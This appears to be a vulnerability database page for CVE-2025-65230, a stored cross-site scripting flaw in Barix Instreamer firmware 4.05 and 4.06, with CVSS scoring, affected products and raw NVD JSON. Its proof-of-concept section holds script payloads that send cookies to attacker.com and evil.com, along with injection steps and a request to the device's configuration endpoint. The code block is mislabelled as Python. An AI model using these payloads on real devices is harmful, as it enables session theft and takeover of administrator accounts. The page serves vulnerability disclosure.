Security Vulnerability Report
中文
CVE-2025-65230 CVSS 5.4 MEDIUM

CVE-2025-65230

Published: 2025-12-08 20:15:53
Last Modified: 2025-12-17 15:14:18

Description

Barix Instreamer v04.06 and v04.05 contains a stored cross-site scripting (XSS) vulnerability in the Web UI Configuration Streaming Destination input.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:barix:instreamer_firmware:4.05:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:barix:instreamer_firmware:4.06:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:barix:instreamer:-:*:*:*:*:*:*:* - NOT VULNERABLE
Barix Instreamer v04.05
Barix Instreamer v04.06

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-65230 Stored XSS PoC for Barix Instreamer // Target: Streaming Destination Configuration Field // PoC Payload - Stored XSS const xssPayload = '<script>\n // Steal cookies and send to attacker server fetch("https://attacker.com/collect?c=" + btoa(document.cookie)); </script>'; // Alternative payload - Session Hijacking const sessionHijackPayload = '<img src=x onerror="\n document.location='https://evil.com/log?cookie='+document.cookie; ">'; // PoC Steps: // 1. Login to Barix Instreamer Web UI // 2. Navigate to: Configuration > Streaming > Destination // 3. Inject payload in "Streaming Destination" or "Target Address" field // 4. Save configuration // 5. When admin views the page, XSS payload executes // Example using fetch API for testing: async function testXSS() { const target = 'http://<target-ip>/cgi-bin/config.cgi'; const data = new URLSearchParams(); data.append('stream_dest', xssPayload); data.append('action', 'save'); // Send authenticated request await fetch(target, { method: 'POST', body: data, credentials: 'include' }); } console.log('CVE-2025-65230 Stored XSS Payload:'); console.log(xssPayload);

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65230", "sourceIdentifier": "[email protected]", "published": "2025-12-08T20:15:52.993", "lastModified": "2025-12-17T15:14:17.550", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Barix Instreamer v04.06 and v04.05 contains a stored cross-site scripting (XSS) vulnerability in the Web UI Configuration Streaming Destination input."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:barix:instreamer_firmware:4.05:*:*:*:*:*:*:*", "matchCriteriaId": "FD70FE86-BD66-43FB-A5A0-3029BECB9F3B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:barix:instreamer_firmware:4.06:*:*:*:*:*:*:*", "matchCriteriaId": "0A17CD90-57A4-4832-BE87-573912DF9CDC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:barix:instreamer:-:*:*:*:*:*:*:*", "matchCriteriaId": "CAA09088-FB0F-4BF3-88E7-3A9D8E0BA26B"}]}]}], "references": [{"url": "https://github.com/iyadalkhatib98/My_CVES/tree/main/CVE-2025-65230", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "Mitigation"]}, {"url": "https://help.barix.com/instreamer/user-manual", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/iyadalkhatib98/My_CVES/tree/main/CVE-2025-65230", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory", "Mitigation"]}]}}